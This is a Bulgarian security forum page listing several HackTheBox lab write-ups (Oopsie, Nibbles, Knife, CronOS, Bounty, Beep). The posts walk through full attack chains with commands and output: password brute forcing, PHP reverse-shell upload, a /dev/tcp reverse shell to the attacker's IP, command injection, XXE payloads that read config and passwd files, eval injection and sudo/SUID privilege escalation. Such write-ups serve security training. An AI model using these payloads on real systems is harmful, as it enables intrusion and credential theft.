Преминете към съдържанието

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

Търсене в общността

Showing results for tags 'hackthebox'.

  • Търти по таг

    Напиши таг и в края сложи запетая
  • Търси по автор

Тип на съдържание


Форум

  • ЗА ФОРУМА / ABOUT THE FORUM
    • Условия за ползване, препоръки и работа с форумите
  • ИНФОРМАЦИОННА СИГУРНОСТ / INFORMATION SECURITY
    • Пенетрейшън тестове
    • Тестове за социално инженерство
    • Експлойти
    • Инструменти
    • Вируси
    • Програмиране
    • Криптография
    • Сертифициране
    • След дъжд-качулка :)
    • Безжични мрежи, мобилни устройства и друг хардуер
    • Роботика и Дронове
    • Физическа сигурност
    • Поверителност | Privacy
  • Ресурси / Resources
    • Новини: По света и у нас
    • Уроци
    • Състезания за хакери
    • Книги, филми, списания
    • Интересни събития
  • ДРУГИ / OTHERS
    • Кариерно развитие
    • Продавалник (Купува/Продава, Търси/Предлага)
    • Съответствие, наредби и стандарти
    • Уеб дизайн
    • Оф-Топик
  • Булхак Академи на Кали Линукс
  • Bodyguard and Security Association на Общи условия

Блогове

  • Булхак Академи на Видеа - YouTube
  • Булхак Академи на HTB - WriteUps
  • Bodyguard and Security Association на Блог

Намери резултати в...

Намери резултати които съдържат...


дата на създаване

  • Start

    Край


Последно обновено

  • Start

    Край


Filter by number of...

Регистриран

  • Start

    Край


Група


За мен


Telegram


Уебсайт


Фейсбук


Интереси


Локация

  1. h3xu

    Oopsie

    # Enumeration #### nmap # nmap -sV -sC -p- -T4 -oA oopsie opsie.htb 130 ⨯ Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 06:18 EDT Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 42.25% done; ETC: 06:19 (0:00:12 remaining) Nmap scan report for opsie.htb (10.10.10.28) Host is up (0.17s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA) | 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA) |_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Welcome Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ## Web Application #### Nikto # nikto -h opsie.htb - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.28 + Target Hostname: opsie.htb + Target Port: 80 + Start Time: 2021-09-15 06:20:43 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.29 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + IP address found in the 'location' header. The IP is "127.0.1.1". + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1". + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-10944: : CGI Directory found + OSVDB-10944: /cdn-cgi/login/: CGI Directory found + OSVDB-3233: /icons/README: Apache default file found. + 10216 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2021-09-15 06:36:11 (GMT-4) (928 seconds) --------------------------------------------------------------------------- + 1 host(s) tested #### Gather Intel Found admin email at the bottom of the page: [email protected] #### Dirbuster: Found login page at /cdn-cgi/login/index.php: ![[Pasted image 20210915134710.png]] #### THC-Hydra Bruteforcing the admin email account on the cgi login form: # hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt opsie.htb http-post-form "/cdn-cgi/login/index.php:username=^USER^&password=^PASS^:F=Login" MEGACORP_4dm1n!! # Reverse Shell We're presented with an authenticated page which contains uploads. However, we cannot reach that page as we are unrpviliged : ![[Pasted image 20210915163835.png]] I access accounts page and notice an id variable which could be changed to show another user by its id. ![[Pasted image 20210915164539.png]] I use intruder to bruteforce the ids by inserting a thousand numbers from 1 to 1000 and found a super user at 30: ![[Pasted image 20210915164700.png]] I access `http://opsie.htb/cdn-cgi/login/admin.php?content=uploads&action=upload` then I change the request with the id and username of super user from within burp. Then generate the burp request within the browser and receive access to the uploads where I upload a php reverse shell which was denied upload but I caught the request again and changed the id and the username to super user again and the file was uploadded. Next, setup netcat: # nc -nvlp 1234 and curl the file from /uploads: # curl http://10.10.10.28/uploads/php-reverse-shell.php # Privilege Escalation Found robert's credentials in website's files within login. www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php <?php $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage'); ?> as robert, his group is called bugtrack i found a file called bugtrack in /usr/bin/ that is with setuid and owned by root. checked its strings and found it uses cat. gonna try to poison the path.. ![[Pasted image 20210915192101.png]] ----------------------------------------- 1. Files with SUID set on. 1. find / -user root -perm -4000 2>/dev/null 2. Investigate the type of file it is: 1. file /usr/bin/bugtracker 3. Investigate the contents of the file and try to understand what it does: 1. strings /usr/bin/bugtracker 4. Open the file to see what it does: 1. it uses cat to dump contents of file 5. Create a new file called "cat" in a write-able directory and add to its contents /bin/bash 1. echo '/bin/bash' > cat 6. Change cat's permissions to 777 1. chmod 777 cat 7. See what is the current directory where the 'cat' file exists and export it: 1. pwd 2. export PATH=/home/robert:$PATH 8. Check if the PATH is exported correctly: 1. echo $PATH 9. Run the vulnerable file: 1. /usr/bin/bugtracker 2. whoami: root
  2. h3xu

    Nibbles

    # Enumeration ## NMAP The nmap scan reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ## Let's see what's the WebApp like. We're greeted by a ***Hello World!*** message. ![[Pasted image 20210409152510.png]] The source code of the page reveals a directory:![[Pasted image 20210409152620.png]] ## Dirbuster Using dirbuster, I have found files within /nibbleblog/content/private/config.xml directory and was able to enumerate possible users:![[Pasted image 20210409152955.png]] I also found a feed.php file which let me into researching if it was a possible attack vector. The research led me into finding this interesting article about feed.php and XSS.[feed injection in web](https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/EN-Feed%20Injection%20In%20Web%202.0.pdf) Anyway.. while it was interesting find, I did not see how it would apply here. So i continued looking. ## Searchsploit I was going nowhere until i simply typed: searchsploit nibble --------------------------------------------------------------------------------------------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- Nibbleblog 3 - Multiple SQL Injections | php/webapps/35865.txt Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | php/remote/38489.rb ----------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Ahh, it looks we have hit. Let's try metasploit: msf6 > search nibble Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload I have used the previously enumerated username:password == admin:nibbles: msf6 exploit(multi/http/nibbleblog_file_upload) > exploit [*] Started reverse TCP handler on 10.10.14.6:4444 [*] Sending stage (39282 bytes) to 10.10.10.75 [+] Deleted image.php [*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.75:32812) at 2021-04-09 08:00:26 -0400 In the following lines I am interacting with the shell. Finally I have discovered interesting file that is with 777 rights. meterpreter > shell Process 1587 created. Channel 0 created. whoami nibbler python3 -c 'import pty;pty.spawn("/bin/bash")' nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler <ml/nibbleblog/content/private/plugins/my_image$ cd /home/nibbler nibbler@Nibbles:/home/nibbler$ ls ls personal.zip user.txt nibbler@Nibbles:/home/nibbler$ unzip personal.zip unzip personal.zip Archive: personal.zip creating: personal/ creating: personal/stuff/ inflating: personal/stuff/monitor.sh nibbler@Nibbles:/home/nibbler$ cd personal/stuff/ cd personal/stuff/ nibbler@Nibbles:/home/nibbler/personal/stuff$ file monitor.sh file monitor.sh monitor.sh: ASCII text nibbler@Nibbles:/home/nibbler/personal/stuff$ ll ll ll: command not found nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la ls -la total 12 drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 . drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 .. -rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh Catting the file revealed nothing interesting tho. After some time, I tried: sudo -l Matching Defaults entries for nibbler on Nibbles: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh AHA! This is our gate to escalating privileges. I have removed the unzipped file and instead uploaded a simple bash script: nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh rm monitor.sh I could not use any editors on the machine, so i Had to create it locally and upload it to the victim. meterpreter > upload monitor.sh [*] uploading : /home/kali/Desktop/monitor.sh -> monitor.sh [*] Uploaded -1.00 B of 21.00 B (-4.76%): /home/kali/Desktop/monitor.sh -> monitor.sh [*] uploaded : /home/kali/Desktop/monitor.sh -> monitor.sh I have moved the file to ***/home/nibbler/personal/stuff*** and execute the following commands to gain root: cat monitor.sh bash -i chmod +x monitor.sh sudo /home/nibbler/personal/stuff/monitor.sh bash: cannot set terminal process group (1360): Inappropriate ioctl for device bash: no job control in this shell root@Nibbles:/home/nibbler/personal/stuff# id id uid=0(root) gid=0(root) groups=0(root)
  3. h3xu

    Knife

    # Enumeration ## nmap # nmap -p- -A -v 10.10.10.242 -oA knife <deleted> PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA) | 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA) |_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Emergent Medical Idea Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel #### Port 80 HTTP Additional information leaked from headers ![[Pasted image 20210720125601.png]] #### Searchsploit Looking at the php, apache versions I have discovered that PHP is vulnerable and there is a python script that spawns shell. # searchsploit -m php/webapps/49933.py Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution URL: https://www.exploit-db.com/exploits/49933 Path: /usr/share/exploitdb/exploits/php/webapps/49933.py File Type: HTML document, ASCII text, with CRLF line terminators Copied to: /root/49933.py # Exploit # python3 49933.py 1 ⨯ Enter the full host url: http://knife.htb Interactive shell is opened on http://knife.htb Can't acces tty; job crontol turned off. $ whoami james $ # Privilege Escalation $ sudo -l Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife $ file /usr/bin/knife /usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife $ file /opt/chef-workstation/bin/knife /opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable $ sudo /usr/bin/knife exec --help knife exec [SCRIPT] (options) -s, --server-url URL Chef Infra Server URL. --chef-zero-host HOST Host to start Chef Infra Zero on. --chef-zero-port PORT Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works. -k, --key KEY Chef Infra Server API client key. --[no-]color Use colored output, defaults to enabled. -c, --config CONFIG The configuration file to use. --config-option OPTION=VALUE Override a single configuration option. --defaults Accept default values for all questions. -d, --disable-editing Do not open EDITOR, just accept the data as is. -e, --editor EDITOR Set the editor to use for interactive commands. --environment ENVIRONMENT Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored). -E, --exec CODE A string of Chef Infra Client code to execute. --[no-]fips Enable FIPS mode. -F, --format FORMAT Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp') --[no-]listen Whether a local mode (-z) server binds to a port. -z, --local-mode Point knife commands at local repository instead of Chef Infra Server. -u, --user USER Chef Infra Server API client username. --print-after Show the data after a destructive operation. --profile PROFILE The credentials profile to select. -p, --script-path PATH:PATH A colon-separated path to look for scripts in. -V, --verbose More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity. -v, --version Show Chef Infra Client version. -y, --yes Say yes to all prompts for confirmation. -h, --help Show this help message. $ sudo knife exec -E 'exec "/bin/sh -i"' No input file specified. $ exit $ ^CExiting... Tried multiple inputs but I am constantly getting *No input file specified.* I think it is because of the exploit. Let's find another one. # wget https://dl.packetstormsecurity.net/2105-exploits/php_8.1.0-dev.py.txt -o php-exploit.py # cat php-exploit.py <deleted> #Usage: python3 php_8.1.0-dev.py -u http://10.10.10.242/ -c ls <deleted> # python3 php-exploit.py -u http://knife.htb -c id [+] Results: uid=1000(james) gid=1000(james) groups=1000(james) # nc -nvlp 1234 1 ⨯ listening on [any] 1234 ... # python3 php-exploit.py -u http://knife.htb -c "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/1234 0>&1'" Now that we have reverse shell and we can freely interact, we can continue on.```bash # nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.242] 51272 bash: cannot set terminal process group (944): Inappropriate ioctl for device bash: no job control in this shell james@knife:/$ james@knife:/$ james@knife:/tmp$ sudo /usr/bin/knife exec -E "exec '/bin/sh -i'" sudo /usr/bin/knife exec -E "exec '/bin/sh -i'" /bin/sh: 0: can't access tty; job control turned off # whoami root Pretty good. Enjoy your day! 🙂
  4. h3xu

    CronOS

    # Enumeration The enumeration results show 3 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel So, we are dealing with an Ubuntu machine that is hosting a WebApp. Port 53 is also open and an ISC BIND service running. Let's research on it a little bit more. [ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system. I was having problems connecting to the web service so I added the IP to the /etc/hosts file. ![[Pasted image 20210413095138.png]] # DNS Enumeration (link) Check out the video from hackersploit and learn about dns enumeration and zone transfers to understand the following lines. $ dig axfr @10.10.10.13 cronos.htb ; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 28 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) ;; WHEN: Tue Apr 13 07:09:07 UTC 2021 ;; XFR size: 7 records (messages 1, bytes 203) I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too in order to access them on the browser. ![[Pasted image 20210413101836.png]] # Admin.cronos.htb & SQLi ![[Pasted image 20210413101925.png]] A Quick SQLi check let's us in. ![[Pasted image 20210413102037.png]] Two tools are running on the welcome.php page. *Ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.### Request POST /welcome.php HTTP/1.1 Host: admin.cronos.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: http://admin.cronos.htb DNT: 1 Connection: close Referer: http://admin.cronos.htb/welcome.php Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26 Upgrade-Insecure-Requests: 1 Sec-GPC: 1 command=traceroute&host=8.8.8.8%3Bls+. I have encoded a semicolon and added the ls command for the current directory. ### Response HTTP/1.1 200 OK Date: Tue, 13 Apr 2021 08:01:47 GMT Server: Apache/2.4.18 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 527 Connection: close Content-Type: text/html; charset=UTF-8 <html"> <head> <title>Net Tool v0.1 </title> </head> <body> <h1>Net Tool v0.1</h1> <form method="POST" action=""> <select name="command"> <option value="traceroute">traceroute</option> <option value="ping -c 1">ping</option> </select> <input type="text" name="host" value="8.8.8.8"/> <input type="submit" value="Execute!"/> </form> config.php<br> index.php<br> logout.php<br> session.php<br> welcome.php<br> <p><a href = "logout.php">Sign Out</a></p> </body> </html>
  5. h3xu

    Bounty

    # Enumeration #### nmap We've found two open ports: 22, 80. # nmap -p- -sV -sC -oA bounty 10.10.11.100 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-04 05:02 EDT Nmap scan report for 10.10.11.100 Host is up (0.049s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA) | 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA) |_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Bounty Hunters Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel # Port 80 The initial page presents us a couple of buttons: * About ![[about us.png]] * Contact ![[contact us.png]] sending any type of message does not get through as a request but instead it goes to the beginning of the page. * Portal It is a bounty portal to submit information. It reflects the input - possible reflected xss ? ![[Pasted image 20210804121947.png]] It says that the db is not ready.... #### nikto Nikto found an interesting php file called ***db.php*** . Maybe it has something in common with the db from the portal. # nikto -h bounty.htb - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.11.100 + Target Hostname: bounty.htb + Target Port: 80 + Start Time: 2021-08-04 05:06:04 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner. + 7786 requests: 0 error(s) and 5 item(s) reported on remote host + End Time: 2021-08-04 05:13:45 (GMT-4) (461 seconds) #### db.php Tried changing the GET request to OPTIONS, PUT and POST but i always receive only 200 OK with no other information. ![[Pasted image 20210804122446.png]] #### Dirbuster Running dirbuster with default dirbuster wordlist discovered the following directories and files: ![[dirb.png]] #### bounty.htb/resources/README.txt Tasks: [ ] Disable 'test' account on portal and switch to hashed password. Disable nopass. [X] Write tracker submit script [ ] Connect tracker submit script to the database [X] Fix developer group permissions #### bounty.htb/resources/bountylog.js From the code beneath we see that the variable and the input is actually xml. The only thing It comes to my mind is XXE. Let's go back to the portal and test. function returnSecret(data) { return Promise.resolve($.ajax({ type: "POST", data: {"data":data}, url: "tracker_diRbPr00f314.php" })); } async function bountySubmit() { try { var xml = `<?xml version="1.0" encoding="ISO-8859-1"?> <bugreport> <title>${$('#exploitTitle').val()}</title> <cwe>${$('#cwe').val()}</cwe> <cvss>${$('#cvss').val()}</cvss> <reward>${$('#reward').val()}</reward> </bugreport>` let data = await returnSecret(btoa(xml)); $("#return").html(data) } catch(error) { console.log('Error:', error); } } #### Portal test for XXE The following oneliner should send a connection to me if it works. In order for the application to understand the request, we need to encode it in base64 (ctrl+B in burp suite): ![[XXE test.png]] And the test is successful: ![[XXE Successful.png]] The following script is taken from (https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/)[blackhillsinfosec] with a little edit, we write assign a variable *xml* with a value that will be executed once envoked from the developer console. var xml = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]> <bugreport> <title>&xxe;</title> <cwe>something</cwe> <cvss>something</cvss> <reward>something</reward> </bugreport>` to Invoke xml: returnSecret(btoa(xml)); Copy the base64 and decode it to get the db file contents. It contains credentials. Now extract the users from the system with the following script: var xml = `<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <bugreport> <title>&xxe;</title> <cwe>something</cwe> <cvss>something</cvss> <reward>something</reward> </bugreport> # returnSecret(btoa(xml;)) Move the users into a file and sort the contents: # cut -d : -f 1 passwords > usrs # Exploit #### Hydra # hydra -L usrs -p <password from db file> 10.10.11.100 ssh #### USER SSH-ing into the machiine as the found user:credentials gives us user. # Privilege Escalation We have a ticket validator file that we can run as root with no password required, also we can run python3.8 (how convenient :D)```bash $ sudo -l Matching Defaults entries for development on bountyhunter: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User development may run the following commands on bountyhunter: (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py #### Ticket Validator Analysis 1. The ticket has to end with .md extension. 2. The contents of the file has to start with "# Skytrain Inc" 3. The following line has to point to destination as so: ## Ticket to 4. the ticket code should start with: __Ticket Code:__ 5. The code is looking for 2x star symbol ( ** ) to remove it and split at position 0 where the + is found. example: **102+```python #Skytrain Inc Ticket Validation System 0.1 #Do not distribute this file. def load_file(loc): if loc.endswith(".md"): return open(loc, 'r') else: print("Wrong file type.") exit() def evaluate(ticketFile): #Evaluates a ticket to check for ireggularities. code_line = None for i,x in enumerate(ticketFile.readlines()): if i == 0: if not x.startswith("# Skytrain Inc"): return False continue if i == 1: if not x.startswith("## Ticket to "): return False print(f"Destination: {' '.join(x.strip().split(' ')[3:])}") continue if x.startswith("__Ticket Code:__"): code_line = i+1 continue if code_line and i == code_line: if not x.startswith("**"): return False ticketCode = x.replace("**", "").split("+")[0] if int(ticketCode) % 7 == 4: validationNumber = eval(x.replace("**", "")) if validationNumber > 100: return True else: return False return False def main(): fileName = input("Please enter the path to the ticket file.\n") ticket = load_file(fileName) #DEBUG print(ticket) result = evaluate(ticket) if (result): print("Valid ticket.") else: print("Invalid ticket.") ticket.close main() Ok let's write our own ticket. The ticket has to complete the requirements in order to be executed. Then in the Ticket Code I decided to go with the example + a random number which equals to something that will return TRUE condition and used "and" to concatenate a system command that will spawn a reverse shell. # Skytrain Inc ## Ticket to __Ticket Code:__ **102+7==109 and __import__('os').system('nc -nvlp 1234 -e "/bin/bash"') == False it seems that the system has a version of nc that does not support the -e flag. Oh, well, we can still dump the flag. $ sudo python3.8 /opt/skytrain_inc/ticketValidator.py Please enter the path to the ticket file. ticket.md Destination: nc: invalid option -- 'e' usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl] [-m minttl] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port] Invalid ticket. Let's edit our ticket code. # Skytrain Inc ## Ticket to __Ticket Code:__ **102+7==109 and __import__('os').system('cat /root/root.txt') == False And execute the code: $ sudo python3.8 /opt/skytrain_inc/ticketValidator.py Please enter the path to the ticket file. ticket.md Destination: <flag> Invalid ticket.
  6. h3xu

    Beep

    # Enumeration The nmap scan enumerated 16 open ports running a variety of services. Nmap scan report for 10.10.10.7 Host is up (0.049s latency). Not shown: 65519 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open smtp Postfix smtpd |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 80/tcp open http Apache httpd 2.2.3 |_http-server-header: Apache/2.2.3 (CentOS) |_http-title: Did not follow redirect to https://10.10.10.7/ 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_pop3-capabilities: APOP TOP RESP-CODES PIPELINING LOGIN-DELAY(0) USER IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE STLS UIDL EXPIRE(NEVER) 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 875/udp status |_ 100024 1 878/tcp status 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 |_imap-capabilities: UIDPLUS LIST-SUBSCRIBED ATOMIC OK URLAUTHA0001 CHILDREN LISTEXT Completed RENAME UNSELECT IMAP4 X-NETSCAPE RIGHTS=kxte THREAD=ORDEREDSUBJECT IDLE CONDSTORE ACL CATENATE ANNOTATEMORE ID THREAD=REFERENCES SORT=MODSEQ LITERAL+ MAILBOX-REFERRALS NAMESPACE NO BINARY SORT STARTTLS MULTIAPPEND QUOTA IMAP4rev1 443/tcp open ssl/https? | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2017-04-07T08:22:08 |_Not valid after: 2018-04-07T08:22:08 |_ssl-date: 2021-04-12T10:58:07+00:00; +3m45s from scanner time. 878/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd |_imap-capabilities: CAPABILITY 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug) |_sslv2: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) 4445/tcp open upnotifyp? 4559/tcp open hylafax HylaFAX 4.3.10 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). # Web Application ## Port 80 Going to https://10.10.10.7 I was greeted by the following login page: ![[Pasted image 20210412140605.png]] ## Port 10000 The nmap scan revealed Webmin httpd service on port 10k. Let's see it: ![[Pasted image 20210412142951.png]] Hmm, interesting. From the URL I can see a ***.cgi*** extension. Let's google the file '*session_login.cgi*'. The results are quite interesting. Let's save some time and try to use "vuln.nse" on port 10k: # nmap -sV -p 10000 --script vuln 10.10.10.7 1 ⨯ Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-12 07:46 EDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 66.20% done; ETC: 07:47 (0:00:00 remaining) Nmap scan report for 10.10.10.7 Host is up 